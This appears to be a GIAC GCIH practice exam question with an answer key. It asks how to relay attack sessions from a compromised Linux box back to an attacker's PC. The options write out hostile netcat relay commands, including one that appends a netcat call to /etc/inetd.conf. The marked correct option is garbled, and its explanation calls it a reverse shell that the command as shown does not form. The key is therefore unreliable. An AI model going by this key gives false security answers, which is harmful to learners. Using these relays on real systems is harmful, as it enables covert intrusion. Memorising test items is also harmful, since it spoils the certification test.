GIAC Certified Incident Handler (GCIH) — Question 101

You have gained access to a Linux box. Which of the following methods would enable you to launch attacks against other systems and send the sessions back to your home PC (10.2.200.1) without altering system config files on the Linux box that might alert the sysadmin?

Answer options

• A. echo 123 stream tcp nowait nobody/usr/sbin/tcpd /usr/bin/nc 10.2.200.1 321 >> /etc/inetd.conf killall -HUP inetd
• B. mkfifo backpipe; nc -l -p 24680backpipe
• C. mkfifo backpipe; nc -l -p 24680 | nc -l -p 54321 10.2.200.1 >backpipe
• D. echo "nc 10.2.200.1 123">>relay.bat; nc -l -p 123 | relay.bat

Correct answer: B

Explanation

Option B is correct because it sets up a named pipe (FIFO) and listens on a port, allowing for a reverse shell without modifying system configurations. Option A modifies the inetd.conf file, which could alert the sysadmin. Option C also attempts to set up a reverse shell but is more complex and may still reveal activity. Option D uses a batch file, which is not an effective way to maintain stealth on a Linux system.